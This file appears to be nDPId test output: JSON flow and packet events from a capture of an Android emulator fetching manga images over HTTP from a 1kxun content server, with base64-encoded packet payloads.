+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385146284,"pkt":"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"} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/00dd6bfe750c02c8d10d7112d143f322.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/00dd6bfe750c02c8d10d7112d143f322.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1654385146458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146458,"pkt":"nLbQ0+MztKXvZygQCABFAAFR8fdAADYG95QOiIhswKgCfgBQwNwlgdAMRlWmyoAYAHrh2AAAAQEICpoJIgUeulbiSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogNDU0MjYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDhjZTAyMDA1YjJiYjVmYzc5Nzk1NTc1NmIwM2EzMTk2OTI2ZTc5OTYNCg0K"} 
02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1654385146460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146460,"pkt":"nLbQ0+MztKXvZygQCABFAAXU8fhAADYG8xAOiIhswKgCfgBQwNwlgdEpRlWmyoAQAHoGUwAAAQEICpoJIgUeulbi\/9j\/4AAQSkZJRgABAQAAAQABAAD\/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL\/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL\/wgARCAI6AbIDASIAAhEBAxEB\/8QAGwAAAgMBAQEAAAAAAAAAAAAAAAMBAgQFBgf\/xAAaAQADAQEBAQAAAAAAAAAAAAAAAQIDBAUG\/9oADAMBAAIQAxAAAAH20E27BKcXAViJSJBAEhBIEEgQTAAAAASAAAAAAAAAEBIQABEwAAAAyCYGXpdICAoRFNwtkoAAADMSVVpqBeaXSmYkJglIAAAAAAAAiQIAAACQAAAAAAAImAAAgAABsACAAi1YGypYShsBVi2AAJAAJku6gAIJgVglBICAAAAAAAAAAgAAAcgCAAAAAAAAgAZEwAAwCBkTAAAXiRKCQIiasYAkAAq1B1ciQkiUiQCQBAAAAAABHBH348TWtPcnj9iXpIw7lmTAEkASEBIAEEBMEDkiQAGETA4JhhEwNkrvMyAKKMAraoOxAJQSXF5kmJICQBSRIAAAQArL5Z36Hy8UrVkpqnoEMlN24W0\/TdLxXUM\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\/cnWFc3cuLjdXXLha9EVOLVtTFchtdlbVcqHLWKq52JSM0rpWk1y2ZpjEtM5iQUQKG6c8g8iWgAAAKlqp2AaAEAAVVaYqqyiay9I3lWnm4Y35dF6Y85kG\/V1nZ7D7LaNvJ1IkmIlI9QzKHP6GbU7vlalCmMzFWOe51pbldoty\/PRz8nrZRY1dKm1Nc2rM3MQsvS9LjMCGpAAiRFCwnIQKaTWXF8T875PN9BzFzu6eZuWxOc59mY9nzek7Z5Pf62Xsehg6OO+jdzdTjUp81mi12p05QmtHQvzFHouj571riMHUiJ8L6LozpfMs6ueuO\/RRyZ6KL14WuSvTjpztX0XOhLRXuBkRMBJEgRMIAAirKjOb0M0JDVO4OpiNGYiZglr5mPwnXHtfEev5\/ZHFZW+uXa9X8899ydeyVsmk78yrO3l4TKizC12uvRaRl6VHrOVO5SOrWrSedn043vszp6EMqhvltiTjdHL3bZt\/bqW52up1zUUWiLAABEgAAAhvmonZbkXjLqP4PoODsrMmzeWjuyfhnx7fI9f4\/ezkJ9r5O4zd\/hQV73fxup5fdptTJtz8HteD9h1PoRJVM3YcBHpb5daxVj6VVVGHFaTqwdA6cet2ZnUwQ2Y5ufqomNbsuvTNkRZKbiE9FkXBgAokoFgAXz+qJebyeiwxlye4\/NehpQ96Oz05uW3ksvs\/"} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1654385146470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146470,"pkt":"nLbQ0+MztKXvZygQCABFAAXUjohAADYGVoEOiIhswKgCfgBQwQSWIbNSmarBiIAQAHrnQQAAAQEICpoJIhIeulb6KGbrQ9NgAoPeIQXK8aNsRvWmWOG2+mJUfVc1tOfBUFm08iHXJpNv2Owf5\/8LnH1ete7iHIgeIQ+NvC5\/VL\/aRL84vFpH3hpuKGie89N\/ltwx+Jf3dMlyw07W7lY\/ANl1EAJvmqFKZxvNP\/7dp2qkMzGNaCj8Doc1sJJRQQ+ao9WYQoMiZ2FUxVUX6mhkQjNYtI4Xmy+wKkhyEHukERva96HY\/dXbvojGVj3HwIwCL7Uu4KCXJCOxCdfzRsyBCPbX85Xo3\/0i+EMzczsTrgKFypwzGJAzBLllK8mrlen1AbXKws\/iFuX9EFW9oTIIiG0ZW4bG5oE4h95E6fNS8I4kaDxPobJq1QBkoPqrtXoiEHjpKULTrft3zYnFpDwQu2eTvwy15CQ2tec5f5m1CtyPkJ8oKSdO\/aLi94jceiOZXraTb6+VbZVTT5v7KqPOtYsl8CgtLKBY9Ot78tCrSByNPAMDNF2pyABksBqbgNk+1a0f6z45tFT7oVWfhgbXl\/on\/kQ2tjjIKII+MrdKpU\/7Pps04g33RP6S4I8ga81Yz5R07ZIyJT6iuback6Gsu\/EUAaiVehLWhou34+zaMkfX4oW8nsmfVHl1TpepxDvzCEYnOi4OxvRscjYz8+bDhvRI9oB6DKa80JOZpGqnO4SIevnAUQte4KcbZKPz6qauxFKMjOPb+Fi92JZNBzuBuVci4AUSISUJZ9pDO344tYqlcxAnz5Lub9aL3azUFNTDSxweDEjd8pW4pwan1wijpkqLHf0vi8uNupO8FH0kib57l4ZodhscgY1lQi\/YP8qhWC\/Ub1YGeDcgEMSVmhxKOxrRmEMxZJH0\/SPVC1Q45KguC3L2a2vUkm\/rWbFirVKvRVj2Z6smUDwqdOzzvBk383pjRzwKiZn+50Qqi6vXyDKsGTAy7P8x6VRpnIzzPW60jAuNOX3Z8JKsQSoQbU7WWYxRsEMq2vDpEdVZDnVZhQNpQTkqwDBMcvnxKwGz371ROj3c1NoOOfCqOGX6dcQUiRIk77k05t4r7lBDoi3JaCOltfNkcyuik3r+d2D8rJRDa0aEaUWI7HzkzGE5xCg05dBJQ+GbxLjA+7YlokrbWDOVI5+7T2BJvj5Z2gSS4bQyr5V6clNZrOF9yEP7TY6KekfQFoBuQkiruOmgQDE3GJilpZpNsJut4YIT7F0OaRSKrHaXWfoS4Pjff1AtIHgB\/bHOLbEtnRDxHNLviswASL0Q8jLLlz3TRCqT8v4o7cRzUn+2eKJxSTko0F7LWInRcpNe9+Y+33MXMVaDAOeHkemly1HrRGPpJskPnYelD9BE\/N2ZrEmqz0vzx+lyA9i46mr4QvLytJqjP9O\/HSqlA1Kx9fxOAXNcAxSgUCEYxWhNuKuqJnLtxuQZR208YZRatEdYzf9DdIBrZeDV9KCfxPH6XHmKZM6Tw3RIrVgIvV1ORu9gNP4ZxWngguwIFKkqm\/QJwvcuq8ge\/\/zWwxnlXlHBvEJwP5OtK
AK0XftE6rJHP2e+bJbxwmb93eYXIbhGdyhKZmqch04CLGO8ZQspqifdGuUIlfUuJjFC7hqacsNLSVicuPJzBOyU2NXprEYWc\/OZbxibYqlUXx1QnIHQ5VZlumABcc0\/1T3FfnECTGn8GRjjkVVUZpIueMMQIx3l8RzJtDm1\/VpZNOhOyDZV1UCnbO7S2SykG2XtX4RCuY7OXA8IZ2JnjkHuxMay4A3uSWOFpP5WNNUcHjze\/bYJSsUoGQ\/ieU17tPeq+kN+I0skTj9BNmaip64x8FfSWbU+sFOV0QwBozGD+Lr+4Fx7eGgUibMhfEp33ZyZZa3ve8AZrylaG4wCMpTMxS0GbDni7A5CuyPiGXxt+Ero\/x3NbA0EZstWz0F5lDlbQrK1AfXK7WKby1kb1HGIl\/BAQCaQBP6s"} 14134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":10146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":10146,"pkt_l4_len":10112,"thread_ts_msec":1654385146472,"pkt":"nLbQ0+MztKXvZygQCABFACeUjolAADYGNMAOiIhswKgCfgBQwQSWIbjymarBiIAQAHqBoQAAAQEICpoJIhIeulb6tgJjnFx8hVIwXR4iVS\/qWz5n+Fxjae7ZlUqBpnRyPdUMUd+QilKzXl7OrNKxG+xfS7TEH288LHzxu8ZitSenHMt52H\/QkEpV69+4AxmflPbcyhYuNqtaP02igUNEXeHnE\/ugkiQLtQdebb8RWtY9VsgDPz9GUtPkZLj16g263T23juO9fsws38GXyF\/QUkl47exxYxCkNwjcpk2rfKmm3nQg7N6W0jqeFp1mCVWfSdnf1Y7Ic0aAspDn0dYX7ERrxAbYuaTLxEKrjn9xjqvkkkgS5vTMQo\/QuHb23Cix7tuT4Z1trzTW8hydtgFvdta227DotNH3yGBi4f+L\/4sXuucsl\/ZYz2EwWxq5jcSLqELfJHxFWvLyS92f\/OP922wdIMEUfGBrUGM\/B3JtuZ3WiM5qe4JQxMfqsdaQSk4KNPI7lDEQlXw1h0iteFlx\/\/sbXUFb7a6zxAGqKLOfVJ8nwgmuJ2JJ7a50wGQcZ5nLknIFyLr5KlKTMbvqLWFs2LMvOv6V3ngFYSqCpTCGvq3EMOwjXIRIIPG0xirKad\/WrPQ8qnK75ee\/4IVUZVYuQzRd7olXfWjNWoMU2XKEWOHVqY0lXpUYEDS21smZjZOKOEbaDcPJR3IR2tSF8v7lmhDnC7A1Q\/ZMUecW1YHLZoxctM+TtOWZT+8NOrxJea3YCm9Yx1kAaAeNlJkXZxTsZx9fiGRUsKJUp87laAJvDIbOMmd8r1aoYTkTFmU\/sSJ8mQf2rPRf1eOXfHgrWYTr5hLNs7M38fDRwMZyvGfVF9JaZJr7oby8iyXNXc7zTY2L\/7mbvHkCPWlgDez3Db3GmjmR1B4zzKCnOT+ig1lwwIJo1WP+cxiw7N2K9r3vspvR5Vcuvuh7tgHpWqmAWhI6fetLr\/c2Vl0iiMIIre8vZpLEHW\/nohVeVVUderzf2dVhF2EtWAMquqz+sXVK0WGqetxa0ic3Oqtaq26N2z5MTbOtJmKxpBzaXCwnIzJfbkvT7NrL2Wy0YeTpBNp\/qObq5eeNpmjp1rcehffZdHdR\/PROFB3yNO91UKg3br6J36EchQjn+HHAf
ILGeZwZXM7g1tOqRvHe74tZLlvy11rPmfX1clEcNLCqdrXEZs6S1hXdICGrhpqkYawHpcEPmYXJpM3IoQIL6\/UfuOmin8lEdLYY6JkRJggUKNF3GopOMtqlw7cN6WYvnHBpqPv+d126Z4G+wSDqysaWGFBAN5NvcQbJbC6Ll61fYucNIkqNOL0YpI0ckzNHkzp7ppuY8oO9Fo0pVc\/ohgagsAS706RZzqtBM771ss7i6ivGHfRBZEjjDIPKsv2Sde9W91iB5ZG1lvOyoiXq+e07SLSxfFtviLdcctt4TbAeowmTgePDz0y3L9AurZZjU4HIorixz5KJ77M2+G+AlWnTOSYKMX0u9tKolMpL1eyCxnoAOfARlh5LFdSrBlImUb8\/QcBlj5qeZRDZQU0B+EzmE+arAHNjN51kGTW6D7VQMJR7u4gZ3CgkHpJn92AK61mPx3iPbbQMIpDgyBDREkqY+81rw9F+VEBGuxGn2OHvqi\/vOzeKm9iM0LloHBhmNL2zynkkneVPICTPD5SM+wMcfYdktvf7olC7djwltDQ1vQJ\/I6RAWfvx2ILm38PTiTvZIBEmYnoBQhOQ0E9Tb4QLfGTKne4btkpduZDgVkqDxDm78xzn71taOI7rLMzMH0SBU\/TziyBk+2oShCxYgmdU0iKDT8r46zjZTZS6v8mEtsdjmBbH7cPpyTT7gKEtnM8zptXWSIhlVykpGlFGFVQescLnpMRvIoRiJxd6HY25i8Q8badO8aZYOw0ti21cGDZu\/crSHqlLbfNys9iM3fwPZY8F2upWh4BROkh4t+NK7aItRWXKGLcjiH8o43WjkrzjhZ62eQB5Wlcc+8CD6CzKirazoV4LzmmyoNOd79K6CEyxZs7LfkoWUz13vIVl5saV+gwv\/uDP2Ytl2FPCGdgA\/v6tuERAYkXOh8gIh1RlzkPREpEf18veddCRJ8z6MI1K9LoTela\/e9o2mTY2e78QaKnXoqh+gJEKGbQQuqA2rJhJstN3uX\/EaXiA2PLbbBotmQW0YcCmKQgJE\/mvmHOw1Qun\/4swBH6823HVEWmKBvS0oVgAqI74vcVeVMBLwWco9z3HlrXT3tEaneofEZozkE7cn9vQB9DnL+4knS9sv3ucRAaCXIaxI7xyr3FbUUZ5Rzhe0H\/cYTVgieCFjpL\/MHbGwM8eU85\/OtgxMEUVvx+FYdQ\/Xus4ZI3uf5Sccum7RwRDv8sIndEhRGPvW6LqHIsTfNccr79CHKeIR7FkuijEUaO\/OqYmPbzQ9YkqFMB0+Tu2de\/pxeyvudZ\/WVSNhP43OsfPzA72r+zg5t61EFhlrL5bWOOEBWzBkPF1I8X818Sf5\/376K5qlegKQkwXbKRdlJ+dBlPBuUql1J0vaDbHbdtkri1pYwK7wgzini332ipIKeGOeTt5wWKs\/UJc8BSkGmhIG8Xe4f\/NsV5rrZCacV9nG2hTZxgeB0tylrutu\/sCHQNDsVGkcvI3gBB3q\/0vTOgej\/JcQ4b1+hotEGJylJ+eyNmc8vorXCiSHXRHzvzK6jk4pp+0UjXNTxLiHVg4qUFAuiZDIaFzX4O6D8VhmHlbVkYqgJqOX\/uGR2w48wcRx9Vc808nXu61mwFTYRoiQq6\/ejhNCo1BFujUS+hAxzQetpO\/K5aXDdT5Q4tardwiCey5R\/S0MvN5lfkF6zaPhPSYKgg\/PVYZCAciZA3MsJgF49NaKBsik5yEhsb0fgHIH4GeJ4dVGypxdg+2R4daILk6+rl5UnRJPB7824ueIIesQbwA0lA8APOM9i8n2eIOONbuW4Fch\/s9RoyFD0e4YfBpbfMeHceRyVw\/U8NAA5miKE7gJ9GuxC\/pLi8D+krZcFlG5qjZxha\/2jvFLl0bUDdodexooW3iKcNN3NfGh0KXY0d1erClHiGv\/E2Ibb5QUKKhz1HCVfievXCuKd+iXQXwtn5XRQBAaoXdq
YslwAQowDTy2gnBMtD6ROBrw\/dyxwRv6sH1TAiCU27nx40639\/Kn+\/kwQflJnb5sjgxAjt821QivnJMxkYJXQSes9hrIx1+nbdW5JwYP22DoX\/Iaf70c5QuYAq3SeuASr+5zuspK2w5qYnsSROZDDRK1QTlHH6uPedRlv9zXiHIQFrgkR2ksd74RBk+t2ovUESSY2bLpgp8wt6Rc7avWpejX4lK\/vTU+HrSv009gZNULrkFU9\/s6bchhE7dkLoaS9\/GzcGhWo3CsP2t0nCGb\/Td2B4xrEPMjPUmL4ec+Izyi00UCIQHdfHsIo6Yd9+hdY7bTkFVVpPGwAIAMYFlXoP+4dIvcw0SwDKskFVWrE53M6bGPKkMA9fESSRf2TnVsJt15VCvXBWWkgs1da5ZsxB8Hxz\/dYLjutOpGakDlN+mjMre8L7PKV4IjOXfFHcklueZlHFfMiKOoAxAnQsxhugdCoiNxI4bCX\/geE0qtc5uywOU\/zahO8RvxDDLxVByl6CpsYll7DpRqay8ia0LpurHZOx2CQoD15zpPDCwpCtrdWUoyRdrGsxmrJ2BOXmiQvThstJVPjn7OD60GBa9VTfhetSOE5A33Rrn5fog05TTsAblGiM3m9yb24drHjEj4HLA0FzYwHEpoPH2DAxRl\/HcA1RuOiYRnNIrcG7werbjY1M3Sa327qYs+3pKFYs\/a35vcUkW6dvfmHWdKRgkl\/lQ8+agNAxx7ytNkTHTtIqy7B8vZAL8KUlPxSj0gt6f0aahHlR4x8+DpVQ03HO6DciE1DtOwpSAVp71Kx1IN67DvbZE5puszzpjMOBMXrHN6EAiyiDkBLRIljHommON+R\/R7kjaffp+gcXAJOOcCJgwyYulXqPEcVjm1lVMWAs1unY+V\/F+uNEJlU+n7ycALtMx8JoapYqpZ\/YERl98enXpnS4JSwG+uXe5eti6wMKtUHR0CpD0ZTaMF8UeGRH7e42Bzv0p2Tu8+lmtnPsKgFOqy4qM8flcxd6FbT51bQmVGBKOz9hsmN+xzNeSS+G06P+gRajneelM9Ml6rshA5Ze9XZNevJ5URGA3+\/4zmL4ZChYcdSj\/dpBrk7KKsyykmGEDSTp0wnUcOoEbwOwdwy0yJSEcPdp5r4I630fJq1ThajSOsveqsNFTGmChRopw616UtUsJ34ZHIEkewDajBG9ciLWIlp9JmiNQA5sdS6h9RnDTz4gD0aZFiDLoQvN9kPOuOrWZL1brHSxQcSnrfMBFNQDS\/T2UGyKc\/3NhjlcLneltmMwChouJwrB1wWnIC01Oz5ybtO8pgf3mNoiFgyjsWkdAUm\/Ilybd1rbLiMUzw1mCAstjt4EOmL7ov3wAjxxXQps5EmW554KBvP1pDfN2rrVJj8KZ39yz2IbgzFEgyGCjwvymAdcelaUJTipIuCs9RDJdcgmqgxPTZvY0sCT6yaegqEtX8mPz0dFB1wQRMIMB3iywLf+BD8w2hn9fbF88bQRFOTjbN9RJAZwgsHlzOUW0OITmS8gMTFjKFJXyDwGQs4V5LS7fkoeavVxpcEnLxnIotXgNPlS6kU3L2b+eqbGq3yEqaqKVaaCBZKDHd4RSvx6acZ5pMN5tixoPl4VRZTUbncjR7CqssSBkstKemgBJcL5ptv5lHRt8KC8r\/D8drxpQU6SzlMe8Tdv4CsPsMIr9ShohN+dGdO\/Q+YZ4MlJdXIWpPVis9KcBa3BMSAQLL+wlyCrC1DxOauyiJX0pZwmBAP3uFWYpTYr755AsZF7IZSWbLH99OcdO6P4QCsINoDJupHWX0kT9\/ILwvpJZdiJQ78usj3ggE6ufPm5r97uptNSwYWvSBqmpmh7Os4JXPxuC\/oYA9qP+88oU+8sIO935wIdjeKeCSU612zzY7tJRMPJqwyaKqX3F2Ml4mDMtJUpcDHDxd5wHlvcRljGERWhx34qQJ0JL1LapC2Yuq4xWUrbCUWI
VjCtmYEfa\/GCOhoSh\/4je8dI1vcbamF7eNP7KRXq8\/j7\/0nPmbGsfJ87rF4KGJE3MFdoClkAlUUrRLaHhiG4eZ9J4RLozN7GBOCkVWWHN5ZAcZUx66oyu0r3mEpWpEYuxlZEtQ0a+RcselQYXz6IuCnJGCHSF5B1YQT8dtCh9Y2xHMplEk9aMjzAZ5TsQ0q0NkXMybToCx5ubpzAZVkBaOnBDwCW5JzH3qkO4m1Y8AzssNxnQddR29gzWPYQyg0Dcxm1OWwVAXNJ6\/SX+S4aDPDV8ymCuPPXQzFDKaJwJOJBrmrARsHZLfI8bbIQ48Fh4G63fa81NkkjBQxfp9npgdy\/bdQCu13ZEFuauYxibrh62hDGVsCl\/5SGVGkTy9NgczZgb\/uar58fVvbN7SIf7HV8afG1gmewssOzVfLq0EfY3Ny8+KiXGGbDHWzNN+mc76\/nymmxBGf58LS4248blw+sucBQGQVLLDUzJUq6oCJofVMo41GsNYXtH6fOPynAzsThq0D8e+jjNCAqLVtm8ZFeahT2ZPmol+LspHBXCkp\/yVPnNsRXEIy1hHfAlZS0eNlJe3RBx3FXhymlEy7K44Tcf5Ni76LhiEOGvYVTVMa27PUfsI40MkT70x7ieJ6FYRIKzUIbAeMHnpEkcHFPy4DbfR3wCD0UChKwSlx6Kady5x470xmBx8VRGz7irKrOxiLKUIWgrzkoggeZwA+lAGQDrqHT4AOKTC4DlKf9XMt2yEfQN1DUxCliAnWe1v3AxbxHAnyrrdBz6rSSe\/EJcFEJPHQDm+UYHvApVKxi\/gRer4sQcA9Qcm4hgZstp4uGyIRjL3SbYY5uAltDI2U+EomQE+SZc99KHDAr0k8k8hb9Gg70cpj29qmGLTPb5l\/3DHw3hH2ywNNERWgs\/V2+UZND4pdNNwRg\/WA+n9o67rtYl6LGQao0ud4GmQNsHYt2eZIgivRYvM3TBPzIaE0iufnYlLjU5EqGxmZxYs40fwTKrnZoQgbAPIbIFFZg6BoCWJhCmgJD78iD4XdzxPvjyshu5A2Z2bNVwSD1OLUxDVRqMgDlcZKJfm2T44YKUT52rhectH4b2OTCH8c1O1WuFpSgRsi9xHBFQHaShA1XiZk+5tiBMMFCLFcC4MqRhIryL1Xt9kVjVw+bLo7UNTs4gMlwM8op3FwFU9JdV1TUw4911Ic+da4z2g0M4eomEnD16ypzV9YvE7PbfX4mG6DIOC7sus4qkeLeUGh+og8npF10LZ6uMQ7NO1jiICa74N4qYd3biZ2PKKCUPsRwiQ8GC4+aFT2\/CElHV9Tus86MeNo1mbxN0MelU9Tv3Re3vPhxieigjbNNg7c8NH1lbKWgphzZEQvqW\/1D\/3eHKWu+1spZcYRk1Cz9Xq47QMTDt1ObhcMRa5MC4OOHU9i+rgy4fH6BSRbTrht3nvfqMzfW\/xgs33D0hwh1eVnBf0PGbhUThT1lBj1exyTJfY0HWfjSfQMcp7I77rxN3+YWgUHV7XikoArasQLBJv4w7LEHyPYY\/+Vj6MwrFWHNchEMNzwTrvd5gF2snhY5eOtRIPg+818Q42DU6OcV4f8vlnYUQXHJ8SkRn+4youn3U7Flx6hzGqd2Kq6kiCNHucaRMmTmTslKYPmix\/DLodndpVGjrAX1amNgwhKlXOsAMB0\/QNROKmcB4zyic9xrBg56IIaTIyKlzKqtQmPzvNxhGKlRMnOEmeJz484gugsUkGQRSGZsTn752c5fp\/IEqJ8uO06Q2Vk9ObzNlHD2qPgNr3K3prb\/xFlwsiNhd3rnU5zIz258tFai7AkGw02iNoM0TXj+mXQMzdOfh3mJ0aCjK6QIj06WOb49ENoiSpchtn\/rXre0PqCm0oC0LPzaEBWDuGyE4WXyH4B7RRFmEYW5slZ9NTVAoOblrF12bwGWUWZDXYeyloF6n2uG\/o9NeOXOAgOMUn6Qv7n9BuhyeC
2CiXSHy9y1DZpR8fSv4tPvT6pSWBaQzn5OybvIa4qPoDDAr\/aevKfSF2fAXnhgGWBUOOTRt+hLhFaJNdtqvRBdx51pBwyIqerZQgU5FRr8SgKQNR2Y2UhyDv23ipzi5YxCcOTZ2jTSqzkEdi3KYA\/wG2cHQGq45NoCTDSnVcPFIudxM\/3a5ry93rXYJZAqX2xeRag6MeTog5DxqXTWxNXleuzrGrp18MJKeuCGoRELstSBk\/OXSRnOOFYAISrRtIKiI1BDl2DG1FmmhToIftE+V7CVluP2754NMSG9uzEeQs3I3J20AiKP212JKOjSwfMFHbTzB6c\/OS\/Dm0j1XZljzAYlUs\/kR1qNINEaMAzMk2pimuLm1hyN5pCk7gZCbYyWGF19\/AwcjkwRD7ghvW+nZXFjdan8PU2wH+591yQMbZ4MbTPbDRHzTL7S+MBYJ2\/sXwg2MY2ZLdztxWVvTvwKnb4PuBIochmxGSp1IXlXQtqTgOX5IOA87fk9yU8i9gc\/SBU9pLrPV3l7cVmIltaUP1TvVwUXppaij\/K5aaC2mJHbFTV4B7kJBIBm8TkDKSz4XSAvvMjAepqD1w\/bbYOlro\/h5d5JOSsR9PyLluINE\/74JuqI68WT6pjkeMox1U3aIghcOOrBvzNoBWC2zU3s0wAhOhXJ5utKtCv\/KPcWNPLlyQqVLFYwGgRuUQqNX0zUfdr0E2gdcPE6qpwGANOs9GCCLDTiiLS7bWx0EfgcReMav5+JEGXSdNByKxrvNDELfM2q+bwY61CR38rzDlmu+d7kCAJE0MfDfOLlvE8jPIcfNslyerg2Niox3zzOOsva9xFQ+7GfKZNfnjZtuNFyHUvIFbrlEpcW2H3B5GCMp18jQh8pWrdZczJcc4Aac0gIh\/f+5s4pgV0LPnYCY8HlcVR4B4j4rf4MStSEHzAfZpX\/kYYtsvurzT9EVgYdMvT8FS4jH1W2j\/U2PegzKYNnP3wpYj9CFYKs2jYvLJ6jvD1XhhfR3HRnE4jc6VMq+DDRHlKhG+mti4SyS7RbgLoH\/gHbyMTarFmt2bNHYKgQjqXC0LQQBv31rntuVVHOOazc1DgG+ROX4T5TvwQs6eGOsWbdrcKWpAUmYroutV5glxQd3vGWZ4LdHNLGKqFDSFYJ1I0CTO38x\/0iw1\/MjeLEzEax+jzi2\/wKhjbPMsNk8t68JhGz+VuwI+Z5Ej3HZjM1rMIfExPRP63c49wg47vGSDiML3Kmr\/StRE1KB\/dkvjdDFkp81ryiM0pXrciOaFy7FbL0Dp3fZxLadEpfIvFfiC+mJ2Ig0nQBpqbcfxt